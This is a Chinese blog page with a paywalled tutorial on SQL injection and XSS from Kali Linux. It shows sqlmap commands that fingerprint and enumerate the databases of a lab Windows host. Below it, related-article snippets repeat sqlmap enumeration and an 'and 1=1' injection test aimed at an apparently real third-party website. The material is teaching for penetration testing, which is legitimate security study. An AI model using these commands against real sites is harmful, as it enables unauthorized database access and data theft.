Kali Linux进行SQL注入与XSS漏洞利用教程（非常详细）网络安全零基础入门必看教程！

最新推荐文章于 2025-12-05 18:17:15 发布

原创

最新推荐文章于 2025-12-05 18:17:15 发布 · 906 阅读

18 ·

CC 4.0 BY-SA版权

文章标签：

#web安全 #渗透测试 #网络安全 #XSS漏洞 #计算机 #SQL注入 #挖漏洞

文章目录

一、实验

1.环境

（1）主机

表1 主机

系统	版本	IP	备注
Kali Linux	2022.4	192.168.204.154（动态）
Windows	10	192.168.204.10	Kali(2022.4)的目标主机

（2）查看Kali Linux (2022.4)系统版本

cat /etc/os-release

（3）查看Kali Linux (2022.4)系统IP地址

ip addr | grep 154

（4）Windows 查看IP地址

ipconfig

（5）Kali主机 ping Windows主机

ping  192.168.204.10

2.Kali Linux 进行SQL注入

(1) LAMP(LNMP)平台

选择Windows版本

https://www.xp.cn/download.html

（2）sqlmap查阅

https://github.com/sqlmapproject/sqlmap

（3）获取服务器信息

包括操作系统、数据库、 web 容器、后端语⾔

sqlmap -u http://192.168.204.10/news/list.php?id=46

（4）获取数据名称列表

–thread 10 线程数设置为10

sqlmap -u http://192.168.204.10/news/show.php?id=46 --thread 10 -dbs

（5）获取当前数据库名称

sqlmap -u http://192.168.204.10/news/show.php?id=46 --current-db

（6）获取当前数据库中所有表的名称

sqlma

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

编程瞬息全宇宙

关注关注

19
点赞
踩
18

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结

杨秀璋的专栏

06-09

1万+

这是作者网络安全自学教程系列，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您喜欢，一起进步。前文分享了WHUCTF隐写和逆向题目，包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目，包括CSS注入、越权、csrf-token窃取及CSP绕过，同时总结XSS绕过知识，希望对您有所帮助。第一次参加CTF，还是学到了很多东西。人生路上，要珍惜好每一天与家人陪伴的日子。感谢武汉大学，感谢这些大佬和师傅们（尤其出题和解题的老师们）~

[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用（二）

热门推荐

杨秀璋的专栏

04-11

1万+

这是作者的网络安全自学教程系列，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您们喜欢，一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目，采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用，通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章，希望对您有所帮助。

参与评论您还未登录，请先登录后发表或查看评论

kali sql注入

zengliguang的专栏

04-27

1394

这是Kali Linux中最常用的自动化SQL注入工具之一，支持多种数据库类型，能进行深度扫描、数据提取、数据库管理操作、甚至获取系统权限。：描述发现的SQL注入漏洞、影响范围、利用方法、获取的数据样本，以及修复建议（如使用参数化查询、输入验证、权限控制等）。：确定要测试的Web应用或API的URL、请求方法（GET、POST等）、可能的输入参数等信息。：记录测试过程中发现的注入点、使用的payload、获取的数据等详细信息，为编写报告做准备。等技巧，提取敏感数据如用户信息、密码哈希、系统配置等。

渗透测试工具：跨站脚本漏洞检测---Xsser

gao646467783的博客

01-27

4317

文章目录简介:用法：（一）、Options:（二）、特别的用法:（三）、选择目标:（四）、现测HTTP/HTTPS的连接类型:（五）、配置请求:（六）、系统验校器:（七）、选择攻击向量(s):（八）、选择Bypasser(s):（九）、特殊的技巧:（十）、 Select Final injection(s):（十一）、 Special Final injection(s):（十二）、混杂模式:（十三）、 Reporting:（十四）、Miscellaneous: 简介: 跨站脚本者是一个自动框架

linux-kali利用BeEF 执行 XSS 攻击

LCH14777475118的博客

06-26

463

文件，在文件里面找到这两串代码。软件（下载最新版的就可以），复制为一个副本，将副本修改为。安装目录中启动它（注意：新的。软件可以用来进行站点搭建。就勾上了靶机所在的浏览器了。，双击从记事本里面打开。，或者可以在配置文件。

网络安全：Kali Linux 进行SQL注入与XSS漏洞利用

cronaldo91的博客

03-27

2623

（3）查看Kali Linux (2022.4)系统IP地址。（2）查看Kali Linux (2022.4)系统版本。（5）Kali主机 ping Windows主机。（14）Windows主机弹出登录界面。（7）获取当前数据库指定的表的字段名。（4）Windows 查看IP地址。（6）获取当前数据库中所有表的名称。（8）获取指定库指定表指定字段的值。(1) LAMP(LNMP)平台。执行 (选择Execute)（15）beef获取账号及密码。（5）启动beef-xss。（9）beef获取目标主机。

kali下的SQL注入（DVWA sql注入 low等级）

weixin_43749051的博客

03-06

2295

（1）在kali下打开浏览器，输入http://192.168.0.184(win7的IP地址)/DVWA/login.php 输入账号密码登录进去，然后点击左侧的“DVWA Security”，选择“low”级别，点击选定。（2）打开火狐浏览器，添加附件组件tamper data，安装后打开，然后登录dvwa，获取cookie值（3）获取要测试的url，点击SQL Injection菜单，在输入框输入1，点击submit，获取待测试的url：http://192.168.169.129/dvwa

黑客入门教程（非常详细）从零基础入门到精通，看完这一篇就够了

最新发布

2301_79455190的博客

12-05

865

与许多较老的UNIX书籍不同，这是一本相对较新的Linux书籍，这本书是由Michael Kerrisk编写的，他是Linux手册的维护成员之一，与许多作者一样，他从1987年开始研究UNIX，并从20世纪90年代末开始关注Linux。这是另一个必不可少的基础条件，学习网络知识，理解网络的构成。这是学习UNIX最好的书之一，是由Richard W. Stevens编写的经典，UNIX是有史以来最好的软件之一，它已经有30多年的历史了，而且仍然很强大，只要UNIX仍然存在，这本书就会一直经典。

网络安全基础技术扫盲篇 — 常见web漏洞之XSS跨站脚本攻击

2401_84301853的博客

04-27

1097

知识宝库在此藏，一键关注获宝藏首先我们了解一下原理，用一句话概括就是。在Web应用中，前端代码主要包括HTML、CSS和JavaScript。：HTML 用于描述网页的结构和内容，包括标签、元素、属性等。前端骨架（有很大关系，但不是该漏洞的利用核心）。：CSS用于定义网页的样式和布局。美化作用（和渗透关系不大）：JavaScript是一种客户端脚本语言，用于实现动态效果和与用户的交互。恶意的JavaScript代码可以直接在用户的浏览器中执行，导致XSS攻击的发生。

kali之sql注入

03-19

807

ASP：1.网址后面加上一撇 ' 报错 and 1=1 正常显示，and1=2报错网址：http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 （get注入）2.kali Linux打开终端输入命令 sqlmap -u 网址 --dbs --current-user （-u 输入目标网址 --dbs表示所有的数据库）3.结果显示出了服务器的...

Kali linux在DVWA靶场的SQL注入

qq_74298120的博客

06-20

2279

SQL注入是一种常见的攻击方式，攻击者通过利用Web应用程序或其他应用程序对数据库的查询进行注入，掌控数据库系统，甚至控制整个应用程序。为了加强Web应用程序的安全性，学习SQL注入攻击技能的同时也要了解防御措施。

使用kali完成sql注入

pray030的博客

12-09

9550

使用kali完成sql注入本文仅用于学术参考分享，如有侵权，请联系作者删除，请勿随意对网站进行sql注入前期准备 1.kali虚拟机（自带sql注入所需工具） 2.能够进行注入的网站实验步骤 1.查看是否可以sql注入 sqlmap -u ‘http://www.kfzhongzhou.com/cyjb_xx.asp?id=14’ GET 2.爆库 sqlmap -u ‘http://www.kfzhongzhou.com/cyjb_xx.asp?id=14’ --dbs 3.查看当前使用的是哪个

kali Liunx 利用漏洞注入——SQL注入

Sword_of_despair的博客

11-19

1249

和其他示例一样，命令注入漏洞是由于输入验证机制不佳，以及使用用户提供的数据来形成字符串，这些字符串可能将用作操作系统的命令。20.下面维续猜解后面的字符，在结果中，你可能会发现%的结果总为 trme,这是因为%是通配符，它可以和任意一个字符匹配到。如果想要获得用户名和密码，就像在前面的小节中所做的那样，需要知道具有这些信息的表的名称。我们的载荷列表是a-&，1-9，和所有特殊符号的集合。应用程序会对上传的文件进行安全检查，当然，安全检查的手段是多种多样的，常见的是对后缀名的检查和。

渗透利器-kali工具 (第三章-5) sqlmap之sql注入一、二

ztc131450的博客

11-11

1257

1.脚本的租用：帮助我们绕过一些WAF，进行测试。2.脚本目录：Tamper目录。3.有哪些脚本：https://xz.aliyun.com/t/2746。

kali使用mysql注入攻击_kali之sql注入

weixin_30588381的博客

01-18

1848

ASP：1.网址后面加上一撇 ' 报错 and 1=1 正常显示，and1=2报错网址：http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 (get注入)2.kali Linux打开终端输入命令 sqlmap -u 网址 --dbs --current-user (-u 输入目标网址 --dbs表示所有的数据库)3.结果显示出了服务器的的操作系统...

kali之使用sqlmap进行sql注入

xv66666的博客

07-26

1175

1、基于布尔的盲注，即可以根据返回页面判断条件真假的注入。2、基于时间的盲注，即不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加）来判断。3、基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回在页面中。4、联合查询注入，可以使用union的情况下的注入。5、堆查询注入，可以同时执行多条语句的执行时的注入。

在kali linux里利用SQLmap实现SQL注入

2201_76034619的博客

06-28

6810

安全等级调为low进入SQL Injection（Blind）页面。

KaLi Linux 利用漏洞注入--SQL

King_mzi的博客

11-23

929

根据 OWASP Top 10 2017 （ https://www.owasp.org/index.php/Top_10-2017_Top_10 ）中的注入缺陷来说，如 SQL、操作系统命令和 XML 注入，是最普遍的漏洞，也是所有 web 应用程序的影响最大漏洞。当来自用户提供的参数的不可信数据由服务器解释时，会出现注入缺陷。然后，攻击者可以诱使解释器将这些数据视为可执行指令，使其执行非预期的命令或在没有适当授权的情况下访问数据。